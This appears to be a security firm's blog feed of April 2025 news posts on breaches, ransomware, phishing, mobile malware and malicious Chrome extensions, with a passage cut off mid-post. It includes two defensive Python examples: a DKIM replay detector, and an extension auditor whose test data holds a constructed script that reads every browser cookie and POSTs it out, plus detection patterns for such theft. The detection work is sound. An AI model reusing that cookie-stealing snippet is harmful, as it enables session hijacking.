#EfaniSecure

2025-04-25

🚨 Gig platforms like Grubhub, Uber, and DoorDash are becoming prime targets for cybercriminals — and gig workers are paying the price.

In February, Grubhub confirmed a data breach exposing customer names, contact info, hashed passwords, and even partial payment data. The breach stemmed from a vulnerability in a third-party vendor.

But this incident highlights a much bigger threat: gig worker platforms are increasingly vulnerable to account takeovers and fraud.

Why are threat actors targeting the gig economy?
- High turnover = less consistent security hygiene
- Users access platforms from multiple personal devices
- Instant payouts make stolen accounts more lucrative
- Contractors rarely receive cybersecurity training

Research from TransUnion shows:
- 34% of gig platform users experienced fraud in 2024 (up from 23% in 2023)
- 75% would switch platforms or stop using an app if they were victimized
- Users want identity protection, fraud monitoring, and stronger safeguards

Experts say stronger defenses are needed, including:
- Mandatory MFA (even SMS-based as a starting point)
- Password manager adoption and secure reset flows
- Monitoring for demographic or device changes on accounts
- Detecting unusual activity with behavioral biometrics (keystrokes, hotkeys, VPN use)

Gig workers' ability to cash out earnings quickly — multiple times a day — makes their accounts especially attractive for attackers. And with payouts hitting $20B in a single quarter at Uber, the stakes are only getting higher.

Cybersecurity teams must go beyond reactive fraud handling. By monitoring login patterns, using behavioral analytics, and enforcing minimum controls, they can disrupt account hijacking attempts before money disappears.

#CyberSecurity #DataBreach #EfaniSecure

2025-04-24

Cybercrime cost Americans a record-breaking $16.6 billion in 2024 — a 33% increase over the previous year, according to the FBI’s Internet Crime Complaint Center (IC3).

The newly released 2025 IC3 report shows:
- 859,532 complaints were filed last year
- 256,256 involved financial losses
- Average loss per victim: $19,372
- Older adults (60+) were hit hardest, with $4.8 billion in losses across 147,127 complaints

The FBI called ransomware the most persistent threat to critical infrastructure, with ransomware-related complaints rising 9% in 2024. However, the report stresses that the true impact is far higher than reported numbers — as most incidents go unreported or underreported.

The FBI clarifies that their loss estimates:
- Do not include lost productivity, downtime, or third-party recovery costs
- Only reflect what’s voluntarily submitted to IC3 or FBI field agents
- Underrepresent industries that choose not to report to law enforcement

Since 2020, IC3 has received 4.2 million complaints totaling over $50 billion in losses. Over 9 million complaints have been submitted since the program’s inception.

In a public warning, the FBI also noted an increase in scammers impersonating IC3 officials, targeting previous fraud victims by offering fake recovery services.

At @Efani, we believe the real number isn’t $16.6 billion — it’s much, much higher. Cybercrime is now an economic threat, not just a tech problem. Ransomware, impersonation, and digital fraud are evolving — and our defenses need to evolve faster.

#CyberSecurity #FBI #EfaniSecure

2025-04-23

🚨 A February ransomware attack on Baltimore City Public Schools has now been confirmed to have compromised sensitive data belonging to over 25,000 individuals — including teachers, staff, contractors, and students.

On Tuesday, the district issued a public breach notification revealing that:
- The ransomware attack occurred on February 13, 2025
- Sensitive documents were stolen, including I-9 records and background checks
- Impacted data includes Social Security numbers, driver’s licenses, passport info, and even student call logs and attendance records
- 55% of all school employees were reportedly affected
- Over 1,150 students — roughly 1.5% of the district's enrollment — had personal information accessed

While no ransom was paid, reports suggest the Cloak ransomware gang may be behind the attack. So far, no group has taken credit publicly.

Additional context:
- Law enforcement was notified
- Cybersecurity firms were brought in for investigation and recovery
- The school district is now offering two years of credit monitoring to impacted individuals
- Affected parties are receiving breach notification letters this week

In a positive step, the district has rolled out new cybersecurity enhancements:
- Endpoint Detection and Response (EDR) software
- District-wide password resets
- Continued forensic investigation

Baltimore has been no stranger to cyberattacks:
- A 2020 school system breach cost more than $10 million
- A 2019 ransomware attack disrupted city-wide operations

And Baltimore’s not alone — experts have already recorded 75 ransomware attacks on U.S. K-12 schools and colleges in 2025, one of the highest numbers ever tracked.

At @Efani, we believe that the education sector — often underfunded and digitally vulnerable — is now squarely in the crosshairs. Schools don’t just need backups. They need active defense, endpoint visibility, and employee training that starts at onboarding.

#CyberSecurity #Ransomware #EducationSecurity #DataBreach #K12CyberRisk #EfaniSecure #BaltimoreCyberattack

2025-04-23

📈 Ransomware and vulnerability exploitation are surging — and attackers are moving faster, hitting harder, and targeting smaller victims more aggressively than ever.

Verizon’s 2025 Data Breach Investigations Report reveals sharp increases across multiple threat vectors:
- Ransomware was present in 44% of breaches (up 37% YoY)
- Exploited vulnerabilities surged 34%, nearly matching credential abuse
- Third-party involvement in breaches doubled, from 15% to 30%

Ransomware now disproportionately impacts small and mid-sized businesses:
- 88% of SMB breaches involved ransomware
- Compared to just 39% in larger organizations
- While ransom payments declined, attack frequency and speed continue to rise
- Median ransom payment dropped from $150K → $115K

Vulnerability exploitation is tightly linked:
- 20% of initial breach vectors came from unpatched vulnerabilities
- Edge devices and VPNs were hit hardest (Ivanti, Cisco, Fortinet, Palo Alto)
- Edge device exploitation grew 8x YoY
- Only 54% of known edge vulnerabilities were fully remediated — median patch time: 32 days

Espionage-motivated breaches also leaned heavily on vulnerabilities:
- In 70% of these cases, initial access came from unpatched flaws
- Ransomware operators and state-backed actors continue to exploit the same gaps

The bottom line: attackers aren’t changing tactics — they’re maximizing opportunity.

At @Efani, we believe these numbers paint a clear picture. SMBs, edge networks, and third-party dependencies are now prime targets. Ransomware may not always demand a payment, but it always demands attention.

#CyberSecurity #Ransomware #VulnerabilityManagement #DataBreach #SMBSecurity #DBIR2025 #ThirdPartyRisk #EfaniSecure

2025-04-23

🚨 Marks & Spencer confirms a cyberattack that disrupted operations, including delays in its popular Click and Collect service.

The British retail giant — with over 1,400 stores and 64,000 employees worldwide — issued a statement through the London Stock Exchange confirming they’re managing an ongoing cybersecurity incident.

Key details:
- Some store operations were temporarily adjusted to protect customer data
- Website and mobile app remain operational
- Delays are affecting Click and Collect orders; customers are asked to wait for confirmation emails before heading to stores
- The company has engaged external cybersecurity experts
- Authorities, including the UK’s data protection office and the National Cyber Security Centre, have been notified

At this stage, no ransomware groups have claimed responsibility, but security experts warn that such silence is common early in extortion-based attacks. If ransomware is involved, there is a high likelihood of data theft — which may later be used to pressure M&S into paying a ransom.

This incident is a reminder that even mature global retailers face significant risks when it comes to supply chain and customer-facing services.

At @Efani, we believe protecting customer trust in retail starts with resilient digital operations. Every outage — especially in fulfillment — risks brand damage that no loyalty program can fix.

#CyberSecurity #RetailSecurity #MarksAndSpencer #Ransomware #IncidentResponse #EfaniSecure #ClickAndCollect #DataProtection

2025-04-22

🚢 While headlines focus on border security, America’s maritime cybersecurity remains dangerously exposed — and adversaries know it.

With 95,000+ miles of coastline and over 360 ports supporting $5.4 trillion in economic activity and 10 million jobs, the U.S. maritime transportation system is both mission-critical and vulnerable.

The August 2024 ransomware attack at the Port of Seattle proved it: mass cargo delays, a breach of 90,000 personal records, and potential risks to life.

As state-sponsored actors like China and Russia ramp up digital attacks on U.S. critical infrastructure, experts are urging a complete overhaul of America’s maritime cyber posture. A few key problems:
- The U.S. Coast Guard lacks cyber expertise and visibility
- Over 200 Chinese-manufactured cranes with foreign software still operate in U.S. ports
- The maritime industry relies heavily on outdated operational tech and software
- SLTT governments lack funding, clear threat metrics, and secure channels for coordination

The solution? A coordinated strategy that includes:
- Modernizing Coast Guard cyber personnel, training, and tools
- Investing in AI, blockchain, and port software upgrades
- Passing the bipartisan Port Crane Security and Inspection Act
- Strengthening public-private partnerships with port operators
- Preserving FEMA’s port cybersecurity grant programs
- Fast-tracking security clearances for local leaders
- Creating a Maritime Security Trust Fund to reinvest port fees
- Launching scholarships to bring new cyber talent into the maritime domain

With legislation like the Cyber PIVOTT Act and Executive Orders on maritime dominance and SLTT resilience, the U.S. has a chance to rebuild its shipping superiority — and secure the supply chain from the sea up.

At @Efani, we believe critical infrastructure security starts with recognition: cybersecurity isn’t just about the cloud or data centers. It’s about every port, crane, and vessel that keeps the nation moving.

#CyberSecurity #MaritimeSecurity #PortSecurity #CoastGuard #CriticalInfrastructure #NationalSecurity #EfaniSecure

2025-04-22

🚨 Two of CISA’s most senior cybersecurity leaders have just resigned — amid growing concerns about staffing cuts and political disruption at the nation’s top cyber defense agency.

Bob Lord and Lauren Zabierek announced their departures Monday morning. Both were instrumental in shaping CISA’s Secure by Design initiative — the agency’s effort to hold tech companies accountable for insecure software and push for systemic product security reform.

- Bob Lord previously led security at the DNC, Yahoo, and Twitter, and was the first CSO at the DNC post-2016 Russia-linked breaches.
- Lauren Zabierek formerly led the Cyber Project at Harvard’s Belfer Center and has a deep background in both intelligence and cybersecurity policy.

While neither disclosed what’s next, their departures come during a period of intense change at CISA:
- Up to 1,300 employees — nearly half the agency — could be cut under the current administration
- DHS recently offered buyouts to staff, and earlier layoffs were challenged in court
- CISA’s leadership and mission are in flux, with its future role in national cyber defense uncertain

Both leaders emphasized the importance of Secure by Design as a foundation for future cyber resilience:
- “There’s a role for everyone in making software safer,” wrote Lord
- Zabierek added: “What started as a government-led call to action has become a global movement”

CISA’s Executive Director Bridget Bean thanked them, saying:
“While our approaches to Secure by Design evolve, our commitment to the principles remains steadfast.”

At @Efani, we believe in cybersecurity that begins at the design phase — not after a breach. We thank Lord and Zabierek for advancing that mission inside government and hope the private sector continues to carry the baton forward.

#CyberSecurity #SecureByDesign #CISA #PublicPrivatePartnership #CyberLeadership #EfaniSecure

2025-04-22

😵💫 Ransomware with a meme twist: the latest Fog attacks come with DOGE-themed ransom notes — mocking victims and even offering free decryption if they "spread the malware".

Researchers at Trend Micro have been tracking a surge in attacks from the Fog ransomware group, which has now hit over 100 confirmed victims since January. While earlier variants relied on compromised VPN credentials, the latest campaigns use phishing emails to deliver a malicious “Pay Adjustment[dot]zip” file that drops the ransomware via PowerShell.

Key observations:
- Initial infection begins with a ZIP file and LNK shortcut
- PowerShell downloads scripts and executables for system profiling, lateral movement, and encryption
- A QR code leads to Monero payment options
- Political commentary and YouTube links are embedded directly in the code
- Sectors hit include tech, education, manufacturing, and transportation

💰 The ransom notes reference the satirical Department of Government Efficiency (DOGE), making absurd demands like “list five tasks you accomplished last week” or “pay one trillion dollars.” In one version, victims are told they can decrypt their system for free — if they forward the malware.

This marks a shift in behavior:
- Originally, Fog didn’t exfiltrate data or run leak sites
- Now, researchers report double-extortion tactics and faster attack cycles
- In some incidents, data was encrypted within two hours of initial access

🛡️ Trend Micro and Darktrace urge organizations to:
- Monitor Fog IoCs
- Segment networks
- Keep offline, tested backups
- Train teams to spot phishing attempts
- Patch VPNs and remote access infrastructure

At @Efani, we believe even “troll” ransomware is no joke. Whether done for profit or chaos, the operational damage from Fog attacks can be severe. Stay vigilant — even the ransom notes are engineered for distraction.

#CyberSecurity #Ransomware #FogRansomware #DOGE #ThreatIntel #EfaniSecure #Phishing #IncidentResponse

2025-04-22

🎙️ Got invited to speak on a crypto podcast? It might be a scam.

A threat group known as "Elusive Comet" is targeting Web3 professionals, founders, and investors — using fake media invites and Zoom calls to infect devices and steal crypto assets.

Researchers at the Open Security Alliance have confirmed that Elusive Comet has already stolen millions, using a mix of social engineering and malware deployment.

Here’s how they operate:
- Create fake brands like Aureon Capital, Aureon Press, and The OnChain Podcast
- Build a convincing online presence with active websites and social profiles
- DM or email victims with interview or podcast invites
- Schedule urgent Zoom calls and ask the target to share their screen
- Then request remote access — and install infostealers or RATs on the victim’s machine

Even the CEO of Trail of Bits was recently targeted under the guise of a "Bloomberg Crypto" interview.

🛡️ Security tips:
- Be cautious with unsolicited interview or partnership invites
- Don’t grant remote control access in Zoom unless you’re 100% sure
- Use cold wallets for crypto and monitor outbound device behavior

At @Efani, we believe the biggest threat to your digital life isn’t always technical — it’s psychological. And Elusive Comet is a reminder of just how polished modern scams have become.

#CyberSecurity #SocialEngineering #CryptoSecurity #ZoomThreats #Infostealer #RemoteAccessTrojan #EfaniSecure

2025-04-22

🚨 Microsoft just moved MSA token signing to Azure Confidential VMs, a major step forward in securing its identity infrastructure after the high-profile Storm-0558 breach.

This move, along with the ongoing migration of Entra ID signing services, is part of Microsoft’s broader Secure Future Initiative (SFI) — described as the largest cybersecurity engineering project in its history.

Here’s what’s changing:
- MSA signing keys now protected inside Azure Confidential VMs
- Entra ID token signing is also being migrated to confidential infrastructure
- Access tokens are generated, stored, and auto-rotated via Azure-managed HSM
- 90% of identity tokens for Microsoft apps now validated via hardened SDKs
- 92% of Microsoft productivity accounts use phishing-resistant MFA
- 81% of production code branches are protected with proof-of-presence MFA
- Security logs have a mandatory 2-year retention period
- A new tenant provisioning system auto-registers tenants into the emergency response process

Microsoft is also piloting isolated customer support environments to reduce lateral movement, a direct response to risks exposed in the 2023 Storm-0558 breach, which involved forged Entra ID tokens using a compromised MSA key.

The attack, attributed to a China-linked threat group, led to unauthorized email access across U.S. and European entities.

This update builds on the lessons from the U.S. Cyber Safety Review Board (CSRB) report and pushes forward a model where signing keys, support processes, and token validation are more tightly controlled than ever before.

At @Efani, we support these kinds of structural shifts — because real security isn’t just about patching flaws after the fact, it’s about re-engineering trust from the foundation up.

#CyberSecurity #Microsoft #EntraID #CloudSecurity #SecureFutureInitiative #Storm0558 #IdentitySecurity #EfaniSecure

2025-04-21

🚨 Over the weekend, Microsoft Entra customers experienced unexpected account lockouts — and it turns out it was caused by a mistake inside Microsoft’s own token logging systems.

On Saturday morning, organizations began receiving alerts from Microsoft Entra ID Protection that certain user accounts had potentially leaked credentials, resulting in auto-lockouts.

Initial suspicion centered around a new enterprise app called “MACE Credential Revocation” — but Microsoft has since clarified the root cause.

According to Microsoft:
- On Friday, April 18, a small percentage of short-lived user refresh tokens were mistakenly logged in full, not just as metadata
- Upon realizing the issue, Microsoft invalidated those tokens to protect customers
- This action inadvertently triggered compromise alerts and lockouts in Entra for affected users

🛠️ The alerts were issued between 4AM and 9AM UTC on April 20.
Microsoft says there’s no evidence that any of the tokens were accessed maliciously. If unauthorized use is detected, their security incident response process will be activated.

Admins affected by this incident can restore access by marking users as “Confirmed Safe” in Entra.

At @Efani, we see this as another example of how even cloud giants can run into operational errors — and why incident response, transparency, and zero-trust token hygiene are essential pillars of identity security.

#CyberSecurity #Microsoft #Entra #TokenSecurity #IncidentResponse #EfaniSecure

2025-04-21

⚠️ Phishers have found a clever way to spoof Google — and their emails pass all security checks.

A new DKIM replay phishing attack abuses Google’s own OAuth infrastructure to send fake messages that look 100% legitimate, including passing DKIM authentication.

What happened:
- A phishing email was sent from “no-reply@google.com”
- It appeared in the user’s inbox alongside real Google security alerts
- The message linked to a fake support portal hosted on sites[dot]google[dot]com — a Google-owned domain
- The attacker used Google OAuth to trigger a real security alert to their inbox, then forwarded it to victims

Why this matters:
- DKIM only verifies the headers, not the envelope — allowing this spoof to work
- The phishing site was nearly indistinguishable from Google’s actual login portal
- Because the message was signed by Google and hosted on a Google domain, it bypassed most users’ suspicions
- Similar tricks have been used with PayPal and other platforms, raising broader concerns

Google has since acknowledged the issue and is working on a fix. But this attack is a reminder:

Even the most secure-looking emails can be fraudulent.
Even Google-signed emails can be weaponized.

🛡️ At @Efani, we advocate for layered defense — because no one layer is ever enough.

#Cybersecurity #Phishing #Google #OAuth #DKIM #EmailSecurity #EfaniSecure #ThreatIntel
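The post notes that DKIM covers the signed headers and body but not the envelope, which is exactly what a replayed message leaves inconsistent. The following is an added example, not code from Efani or Google: it takes a message whose DKIM signature has already been verified upstream and checks the things the signature does not pin down (Return-Path relay, signed To vs. actual recipient, From alignment, a lure on a user-editable Google-owned site). Header values, domains and the `attacker-relay.example` relay are constructed.

```python
"""Heuristic indicators that a validly DKIM-signed message was replayed through a third party."""
import email
import re
from email import policy

# A lure hosted on a Google-owned but user-editable site is part of the pattern described above.
USER_HOSTED_GOOGLE = re.compile(r"https?://sites\.google\.com/", re.IGNORECASE)

def parse_dkim_tags(sig_value):
    """Split a DKIM-Signature value into tag=value pairs, dropping folding whitespace."""
    tags = {}
    for part in sig_value.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip()] = re.sub(r"\s+", "", value)
    return tags

def addresses(header_value):
    """All e-mail addresses found in a header value, lower-cased."""
    return [a.lower() for a in re.findall(r"[\w.+-]+@[\w.-]+", str(header_value or ""))]

def domain_of(address):
    return address.rsplit("@", 1)[-1]

def aligned(domain, signing_domain):
    """DMARC-style relaxed alignment: same domain as d= or a subdomain of it."""
    return domain == signing_domain or domain.endswith("." + signing_domain)

def replay_indicators(raw_message):
    """Return indicator codes. Assumes the DKIM signature itself was already verified upstream."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    sig = msg.get("DKIM-Signature")
    if sig is None:
        return ["no-dkim-signature"]
    tags = parse_dkim_tags(str(sig))
    signing_domain = tags.get("d", "").lower()
    signed_headers = {h.lower() for h in tags.get("h", "").split(":") if h}
    findings = []
    # 1. Header From should align with d=; DKIM alone does not require this, DMARC does.
    from_addrs = addresses(msg.get("From"))
    if from_addrs and not aligned(domain_of(from_addrs[0]), signing_domain):
        findings.append("from-not-aligned-with-dkim-domain")
    # 2. The envelope sender is not covered by the signature; a relay that differs from the
    #    signing domain is the hallmark of a forwarded (replayed) message.
    envelope = addresses(msg.get("Return-Path"))
    if envelope and not aligned(domain_of(envelope[0]), signing_domain):
        findings.append("envelope-sender-mismatch")
    # 3. If To is signed it cannot be rewritten, so a replayed alert still names the mailbox
    #    that originally received it rather than the person it was delivered to.
    delivered = set(addresses(msg.get("Delivered-To")))
    if "to" in signed_headers and delivered and not delivered & set(addresses(msg.get("To"))):
        findings.append("signed-to-not-recipient")
    # 4. The body is signed too, so the lure link had to be in the original message already.
    body_part = msg.get_body(preferencelist=("plain", "html"))
    body = body_part.get_content() if body_part is not None else ""
    if USER_HOSTED_GOOGLE.search(body):
        findings.append("user-hosted-google-link")
    return findings

# Constructed sample: a Google-signed alert relayed by a third party to a victim (all values made up).
SAMPLE_REPLAYED = "\n".join([
    "Return-Path: <bounce@attacker-relay.example>",
    "Delivered-To: victim@example.org",
    "DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=20230601;",
    " h=from:to:subject:date; bh=CONSTRUCTED; b=CONSTRUCTED",
    "From: Google <no-reply@google.com>",
    "To: attacker-mailbox@attacker-relay.example",
    "Subject: Security alert",
    "Date: Mon, 21 Apr 2025 09:00:00 +0000",
    "",
    "Review the case at https://sites.google.com/view/constructed-case-page",
    "",
])
# Constructed sample: the same kind of alert delivered directly by the signing domain.
SAMPLE_DIRECT = "\n".join([
    "Return-Path: <no-reply@google.com>",
    "Delivered-To: victim@example.org",
    "DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=20230601;",
    " h=from:to:subject:date; bh=CONSTRUCTED; b=CONSTRUCTED",
    "From: Google <no-reply@google.com>",
    "To: victim@example.org",
    "Subject: Security alert",
    "Date: Mon, 21 Apr 2025 09:00:00 +0000",
    "",
    "Review recent activity at https://myaccount.google.com/notifications",
    "",
])

if __name__ == "__main__":
    print("replayed:", replay_indicators(SAMPLE_REPLAYED))
    print("direct:  ", replay_indicators(SAMPLE_DIRECT))
```

These checks complement, not replace, signature verification and DMARC: a message that passes DKIM but trips `envelope-sender-mismatch` together with `signed-to-not-recipient` is a strong replay signal worth quarantining for review.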

2025-04-21

🚨 A new Android malware campaign is using NFC relay attacks to clone credit cards — and it’s nearly invisible to antivirus tools.

Security researchers have discovered 'SuperCard X', a malware-as-a-service (MaaS) platform that allows cybercriminals to steal card data and make contactless payments using compromised Android devices.

Key highlights from the report:
- Distributed via social engineering scams through fake SMS or WhatsApp messages
- Victims are tricked into installing a malicious app disguised as a bank “verification” tool
- Once installed, it uses NFC to read card chip data and sends it to a second attacker device
- Attackers use a companion app to emulate the victim’s card and make payments or ATM withdrawals

🔍 What makes it dangerous:
- SuperCard X requests minimal permissions, making it hard to detect
- It uses ATR-based card emulation and mutual TLS (mTLS) for secure communication
- Malware is not flagged by any antivirus engines on VirusTotal
- Transactions are small, instant, and look legitimate to banks — making them harder to detect or reverse

🛡️ Google responded saying Play Protect is active and currently no such apps are listed on Google Play. But since these apps spread outside the store, Android users remain at risk — especially if they sideload apps or fall for impersonation scams.

This is a textbook example of how mobile payment infrastructure is being exploited — and why NFC security deserves more attention in mobile-first threat models.

At @Efani we’re committed to helping protect high-risk users from silent, evasive mobile threats just like this.

#Cybersecurity #AndroidMalware #NFC #MobileSecurity #EfaniSecure #SuperCardX #FintechFraud #MalwareAsAService

2025-04-21

🚨 Palantir is facing renewed scrutiny over its $30M contract with ICE — but the company is doubling down on its mission.

Y Combinator founder Paul Graham criticized Palantir for building tech that powers what he called the “infrastructure of the police state.” The comments were sparked by filings revealing that ICE is working with Palantir to develop an “Immigration Lifecycle Operating System” — a tool designed to help identify deportation targets and monitor self-deportations in near real-time.

In response, Palantir’s global head of commercial, Ted Mabrey, issued a strong defense of the company’s work:
- He cited Palantir’s origins with DHS after the murder of Agent Jaime Zapata in an anti-cartel operation
- He emphasized the life-saving potential of Palantir’s software and the high stakes its engineers face
- He framed the criticism as a familiar attack on mission-driven government tech, referencing Google's Project Maven
- He reiterated the company’s values: belief in mission, resilience under scrutiny, and commitment to lawful use of technology

While Mabrey didn’t directly address Graham’s challenge to formally commit that Palantir won’t support unconstitutional practices, he noted the company has made that commitment internally and publicly “in many ways from Sunday.”

Palantir continues to recruit with a clear message — that Western democracies must not lose their technological edge and that responsible partnerships with government are essential.

What this debate highlights:
- The growing divide in tech around public sector work, especially involving surveillance and law enforcement
- The challenge of building secure tools that serve national interests while protecting civil liberties
- The reputational risks companies face when government contracts intersect with immigration and constitutional rights

At @Efani, we’re deeply aware of the tension between innovation and privacy — and this is a reminder that cybersecurity, data ethics, and constitutional accountability must evolve together.

#CyberSecurity #DataPrivacy #Palantir #SurveillanceTech #ICE #GovTech #EfaniSecure

2025-04-18

🚨 A new U.S. House report on DeepSeek highlights how one Chinese AI model may be quietly reshaping global AI strategy — and risking American data privacy.

The House Select Committee on the CCP has released findings on DeepSeek’s R1 model, revealing:
- $420M in funding from High-Flyer Quant, a Chinese trading firm
- Access to 10,000+ NVIDIA A100 chips via the Firefly supercomputing infrastructure
- Ties to China's surveillance ecosystem, including China Mobile
- Allegations of illegal training data use and export control circumvention
- App behavior that mimics spyware: collecting device IDs, typing cadence, and chat history

Lawmakers warn that DeepSeek:
- Functions as an open-source intelligence asset for China
- Circumvented guardrails from U.S. AI companies to accelerate its own development
- Operates under a tightly controlled tech ecosystem with deep state-linked partnerships

An OpenAI exec told the committee that DeepSeek “circumvented guardrails to extract reasoning outputs,” accelerating their model using techniques like distillation — potentially copying U.S. tech at lower cost.

Even more concerning:
- User data is routed via infrastructure tied to China Mobile
- DeepSeek does not encrypt much of its traffic
- It censors content critical of the Chinese government

🛡️ What this means:
- Export controls alone aren’t enough — the U.S. must improve early threat tracking
- Agencies should restrict procurement and usage of Chinese AI models
- More visibility and scrutiny are needed around AI supply chains and infrastructure

At Efani, we believe real AI security starts with understanding who’s behind the tools we use — and where our data ends up. This report is a wake-up call for all of us building or relying on AI systems today.

#AI #Cybersecurity #DeepSeek #China #DataPrivacy #EfaniSecure #ExportControls #NationalSecurity

2025-04-18

🚨 Over 6 million Chrome users may have unknowingly installed extensions with hidden tracking code — some with spyware-like behavior.

Researcher John Tuckner from Secure Annex discovered 57 extensions, some of them public, others hidden and only accessible via direct URL. These extensions pose serious security and privacy risks.

Here’s what these extensions can do:
- Access cookies, including sensitive headers like 'Authorization'
- Monitor browsing behavior and collect top-visited sites
- Modify search engines and results
- Inject remote scripts into webpages via iframes
- Execute commands remotely, including opening/closing tabs
- Activate tracking features on demand

Some extensions claim to be security or privacy tools — including names like “Fire Shield Extension Protection,” “Securify,” and “Browser Checkup” — but contain heavily obfuscated code and suspicious external callbacks to domains like "unknow (dot) com".

📛 These extensions are:
- Not searchable on the Chrome Web Store
- Actively pushed via ads and shady websites
- Operating under broad permissions without clear purpose
- Still live in some cases, despite partial takedowns

Here are some of the most-downloaded suspicious extensions:
- Cuponomia – Coupon and Cashback (700,000 users)
- Fire Shield Extension Protection (300,000 users)
- Browser WatchDog for Chrome (200,000 users)
- Securify for Chrome™ (200,000 users)
- Total Safety for Chrome™ (300,000 users)

If you use Chrome:
- Review your installed extensions
- Remove any of the above immediately
- Reset passwords for accounts you’ve accessed recently
- Avoid installing browser tools from unverified sources

🔐 At @Efani we believe privacy tools shouldn’t come with surveillance built in. Always check extension permissions — and if it asks for too much, it’s probably taking more than it gives.

#CyberSecurity #BrowserSecurity #ChromeExtensions #Spyware #EfaniSecure #Privacy
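The "review your installed extensions" step above is easier with a static triage pass over each extension's `manifest.json` and bundled scripts. This is an added example, not a tool from Secure Annex or Google: it flags the permission combinations behind the capabilities listed in the post (cookies, request monitoring, tab control, code injection, everywhere-host access, non-store update URLs) and greps scripts for remote-code and obfuscation signals. The manifest, script snippet and `constructed-example.invalid` URL are constructed; the unpacked-extension path layout (`<profile>/Extensions/<id>/<version>/`) is Chrome's.

```python
"""Static triage of Chrome extension manifests and bundled scripts (added example)."""
import json
import os
import re

# Permissions behind the capabilities listed above. Any one is legitimate for some extensions;
# several together in a self-described "security" or "protection" tool are worth a hard look.
HIGH_RISK_PERMS = {
    "cookies": "read cookies, including session cookies, for permitted hosts",
    "webRequest": "observe every request the browser makes",
    "webRequestBlocking": "modify or block requests",
    "declarativeNetRequest": "rewrite requests, e.g. redirect searches",
    "tabs": "enumerate, open and close tabs",
    "scripting": "inject code into pages",
    "history": "read full browsing history",
    "management": "disable other extensions",
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
STORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"
# Source-level signals of remote code loading or obfuscation in bundled scripts
SCRIPT_SIGNALS = {
    r"\beval\s*\(": "eval() call",
    r"new\s+Function\s*\(": "Function constructor (runtime code generation)",
    r"createElement\s*\(\s*['\"]iframe['\"]": "dynamic iframe creation",
    r"chrome\.cookies\.getAll": "bulk cookie read",
    r"[A-Za-z0-9+/]{200,}={0,2}": "long base64-looking blob",
}

def audit_manifest(manifest):
    """Return human-readable findings for one parsed manifest.json."""
    findings = []
    perms = set(manifest.get("permissions", []))
    # MV2 puts host patterns in "permissions"; MV3 moves them to "host_permissions"
    hosts = set(manifest.get("host_permissions", [])) | {p for p in perms if "://" in p or p == "<all_urls>"}
    for perm in sorted(perms & set(HIGH_RISK_PERMS)):
        findings.append(f"permission {perm}: can {HIGH_RISK_PERMS[perm]}")
    if hosts & BROAD_HOSTS:
        findings.append("host access to every site")
    for script in manifest.get("content_scripts", []):
        if set(script.get("matches", [])) & BROAD_HOSTS and script.get("all_frames"):
            findings.append("content script injected into all frames of all sites")
    update_url = manifest.get("update_url")
    if update_url and update_url != STORE_UPDATE_URL:
        findings.append(f"updates from non-store URL {update_url}")
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):  # MV3 form
        csp = csp.get("extension_pages", "")
    if re.search(r"script-src[^;]*https?://", csp):
        findings.append("CSP allows remote script sources")
    return findings

def audit_script(source):
    """Return the labels of SCRIPT_SIGNALS present in one JavaScript source."""
    return [label for pattern, label in SCRIPT_SIGNALS.items() if re.search(pattern, source)]

def audit_unpacked_extension(ext_dir):
    """Audit one unpacked extension directory, e.g. <profile>/Extensions/<id>/<version>/."""
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    findings = [f"manifest: {f}" for f in audit_manifest(manifest)]
    for dirpath, _, files in os.walk(ext_dir):
        for name in files:
            if name.endswith(".js"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings += [f"{os.path.relpath(path, ext_dir)}: {label}" for label in audit_script(fh.read())]
    return findings

# Constructed manifest modelled on the "protection tool" pattern described above (not a real extension).
CONSTRUCTED_MANIFEST = {
    "manifest_version": 3,
    "name": "Constructed Shield Protection",
    "version": "1.0",
    "permissions": ["cookies", "webRequest", "tabs", "scripting", "storage"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"], "all_frames": True}],
    "update_url": "https://updates.constructed-example.invalid/crx",
}
# Constructed snippet of the kind of bundled script such an extension ships.
CONSTRUCTED_SCRIPT = (
    "const f=document.createElement('iframe');f.src=atob(cfg.u);document.body.append(f);"
    "eval(atob(cfg.c));chrome.cookies.getAll({},c=>fetch(cfg.x,{method:'POST',body:JSON.stringify(c)}));"
)

if __name__ == "__main__":
    for line in audit_manifest(CONSTRUCTED_MANIFEST) + audit_script(CONSTRUCTED_SCRIPT):
        print("-", line)
```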

2025-04-18

⚠️ Legends International, the entertainment services giant behind venues like SoFi Stadium and Wembley, has disclosed a data breach impacting employees and venue visitors.

The breach was discovered on November 9, 2024, when unauthorized activity was detected in its IT systems. The company launched an investigation with external cybersecurity experts and confirmed that personal data files were exfiltrated — though the exact data types remain unspecified.

Legends International:
- Operates across 350+ venues globally
- Manages stadiums like Santiago Bernabeu, Camp Nou, Anfield, AT&T Stadium, and One World Observatory
- Recently acquired ASM Global to expand global venue operations

Given the scale of its operations and the volume of personal data it handles, this breach is significant — even though the full scope is still unclear.

The company:
- Says security measures were in place prior to the attack
- Restored systems and added undisclosed improvements post-breach
- Is offering 24 months of identity theft protection through Experian
- Claims no evidence of misuse has surfaced so far

Affected individuals have until July 31, 2025, to enroll for protection services.

As of now, no ransomware group has claimed responsibility. The method of attack and identities of the threat actors are still unknown.

At @Efani we believe incidents like this underscore the need for real-time monitoring, attack surface management, and breach response strategies — especially for organizations in high-footfall industries like entertainment and sports.

#CyberSecurity #DataBreach #LegendsInternational #Infosec #EfaniSecure

2025-04-18

⚠️ CVE-2025-24054 is now under active attack — and it only takes a single click to leak NTLM hashes from a Windows system.

CISA has added this medium-severity Windows vulnerability to its Known Exploited Vulnerabilities catalog after confirming exploitation in the wild. The flaw enables attackers to harvest NTLM credentials through specially crafted .library-ms files.

Here’s how it works:
- A user receives a malicious file — even a single click (no execution needed) can trigger NTLM hash leakage
- Attackers send these files via phishing emails, often packed in ZIP archives or delivered directly
- Opening the archive or previewing the file initiates an SMB request, leaking NTLMv2-SSP hashes
